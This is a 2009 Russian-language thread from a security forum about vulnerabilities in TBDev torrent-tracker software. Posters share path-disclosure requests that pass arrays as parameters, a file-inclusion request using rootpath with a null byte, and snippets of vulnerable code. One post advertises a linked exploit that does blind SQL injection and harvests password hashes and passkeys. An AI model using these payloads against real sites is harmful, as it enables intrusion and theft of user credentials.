ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #221  
Старый 28.09.2009, 13:32
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Собственно,понятия не имею было,или небыло,но когда рылся в коде дивжка,для самообразования,нашол:
PHP код:
http://target.com/rss.php?feed=dl&cat=31&passkey[]= 
Раскрытие путей.
 

  #222  
Старый 28.09.2009, 13:36
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

И еще,незнаю будет ли работать гдето еще,ибо нет желания тестировать,но трекеры в моей локальной сети точно подвержены:
PHP код:
http://good73.net/getrss.php 
При нажатии сабмита имеем POST данные:
PHP код:
cat%5B%5D=22&cat%5B%5D=20&cat%5B%5D=12&feed=web&login=passkey 
Так вот,если просто повторить запрос,использовав при этом urlencode()(как в примере),получим раскрытие путей:
PHP код:
Warningimplode() [function.implode]: Invalid arguments passed in /usr/local/www/target.com/getrss.php on line 56 
 

  #223  
Старый 28.09.2009, 13:42
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Извиняюсь что в несколько постов,просто в данный момент пишу с нетбука,который очень меня напрягает.
Все знают,про такую кнопку как "Спасибо",так вот,сабмитим ее,и имеем POST-данные вида:
PHP код:
torrentid=33042&ajax=yes 
Создаем в качестве ajax,массив,с темже именем,то есть:
PHP код:
torrentid=33042&ajax[]=yes 
Меня выкидывало на ошибку MySQL.Незнаю,возможно есть шанс раскрутить в скулю,но я в этом не силен.Это я оставлю на ваш тест
 

  #224  
Старый 29.09.2009, 11:00
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию

Цитата:
Создаем в качестве ajax,массив,с темже именем,то есть:
$ajax = (string) $_POST["ajax"];
а ошибка ибо уникальные индексы
 

  #225  
Старый 29.09.2009, 11:06
Gray_Wolf
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900

Репутация: 399
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
по моему тут все равно есть баги
Но в паблик их врядли станут выкладывать
 

  #226  
Старый 29.09.2009, 11:22
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Ну лан спалю одын приват =) на те старые версии
куча LFI & RFI =) мб и не приват

к примеру файл recover.php

PHP код:
require "include/bittorrent.php";

dbconn();

if (
$_SERVER["REQUEST_METHOD"] == "POST")

подгружает файлик bittorrent.php а в нем

PHP код:
if (empty($rootpath))
    
$rootpath ROOT_PATH;
require_once(
$rootpath 'include/core.php');
?> 
если прочесть его, то по смыслу ,если $rootpath не пустой ,тогда такой $rootpath = ROOT_PATH; замены не будет; и значит - уязвим надеюсь я правильно его прочел))

При REGISTER_globals = on и MQ= off

http://127.0.0.1/treker/recover.php?rootpath='%00

Warning: require_once(') [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\treker\include\bittorrent.php on line 57


файлы имеющие такую особенность :
faq.php
recover.php
bookmarks.php
rules.php
download.php
....по моему почти все =\

Раскрытие путей :

так как mysql_real_escape_string
PHP код:
function sqlesc($value) {
    
// Stripslashes
   /*if (get_magic_quotes_gpc()) {
       $value = stripslashes($value);
   }*/
   // Quote if not a number or a numeric string
   
if (!is_numeric($value)) {
       
$value "'" mysql_real_escape_string($value) . "'";
   }
   return 
$value;

captcha.php?imagehash[]=

Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in C:\xampp\htdocs\treker\include\functions.php on line 462

гуглом поискал не нашел))
еще раскрытие путей
PHP код:
$pic htmlspecialchars($_GET["pic"]);

stdhead("Просмотр картинки");
print(
"<h1>$pic</h1>\n");
print(
"<p align=center><img src=\"torrents/images/$pic\"></p>\n");
?> 
viewimage.php?pic[]=

Последний раз редактировалось HAXTA4OK; 29.09.2009 в 13:44..
 

  #227  
Старый 29.09.2009, 16:04
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию

для меня это как два года боян, два - я указываю что отключайте регистер глобалс, не отключили - их личные проблемы
 

  #228  
Старый 02.10.2009, 15:36
Rostov114
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме:
95382

Репутация: 29
Отправить сообщение для Rostov114 с помощью ICQ Отправить сообщение для Rostov114 с помощью AIM Отправить сообщение для Rostov114 с помощью Yahoo
По умолчанию

Что же подольем немного масла. Слоит v3.3.

На данный момент он умеет обходить:
  • Коды регистрации
  • Запросы инвайтов
  • Бан по IP

Совершает атаки через:
  • ./rss.php (слепая SQL, ибо запись файла не айс)
  • ./requests.php
  • ./takesignup.php
  • ./check_signup.php
  • ./viewoffers.php
  • ./sendbonus.php
  • ./bonuscode.php
  • Форум

Также имеет 2 способа работы:
  • Multi mode - атака по всем файлам, в том числе авторигистрация.
  • Login exploit mode - работает только с логином и пассом.

Добавлено и доработано:
  • Получение всех IP адресов сайта и подключение
  • Если не верно указан хост то сплоит и не начнет работу.
  • Получение: соли, пассхеша, пасскея и инфы привязан ли пасскей к IP
  • Если в конце адреса трекера не был указан слеш, то теперь сплоит с ума не сходит
  • Вывод каким методом сплоит будет атаковать (чисто для информации)

В данный релиз не вошло следующие веши и также были удалены
  • Генерация приятных уху никнеймов
  • Удалена атака через rss.php - file record

В связи с тем что форум не захотел отобразить не маленький сплоит. Пришлось его загрузить на отдельный сервер. Взять его можете здесь

Если по каким то причинам данный скрипт у вас не запускается, виноваты вы. Он рабочий, проверялся на оригинальном TBDev 2.0.

Внимание: Данная программа выложена здесь для ознакомления.
Автор не несёт ответственности за негативные последствия, причинённые данной программой в результате правильного или неправильного её использования.
Также автор не несет ответственности за причерченный вред кому либо данной программой.


Чтож, прикрываем оперативно дырки.
 

  #229  
Старый 02.10.2009, 20:05
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию

sendbonus, bonuscode?????? WTF?

Как вы поясните собираетесь обходить $b = get_row_count("captcha", "WHERE imagehash = ".sqlesc($_POST["imagehash"])." AND imagestring = ".sqlesc($_POST["imagestring"]));?

Даже если оба 0000000 и 0 - строчек-то тоже 0!
 

  #230  
Старый 02.10.2009, 23:14
Rostov114
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме:
95382

Репутация: 29
Отправить сообщение для Rostov114 с помощью ICQ Отправить сообщение для Rostov114 с помощью AIM Отправить сообщение для Rostov114 с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Yuna  
sendbonus, bonuscode?????? WTF?

Как вы поясните собираетесь обходить $b = get_row_count("captcha", "WHERE imagehash = ".sqlesc($_POST["imagehash"])." AND imagestring = ".sqlesc($_POST["imagestring"]));?

Даже если оба 0000000 и 0 - строчек-то тоже 0!
Да. Если включен error_reporting. То вывалиться ошибка, по которой уже можно судить, тому ли равна данная позиция или нет.

Хм... ну у нас выходит запрос вида:
Код:
SELECT COUNT(*) FROM captcha WHERE imagehash = 'принятый_imagehash' AND imagestring = 0
Чесно не вникал как MySQL обрабатывает данный запрос, но по моему он хватает только 1й параметр а т.к. второй 0 отбрасывает.
Кстати, бага такого же вида и на инвайтах. Есть ведь супер инвайт в 32 нуля...и работает ведь.

Последний раз редактировалось Rostov114; 02.10.2009 в 23:21..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ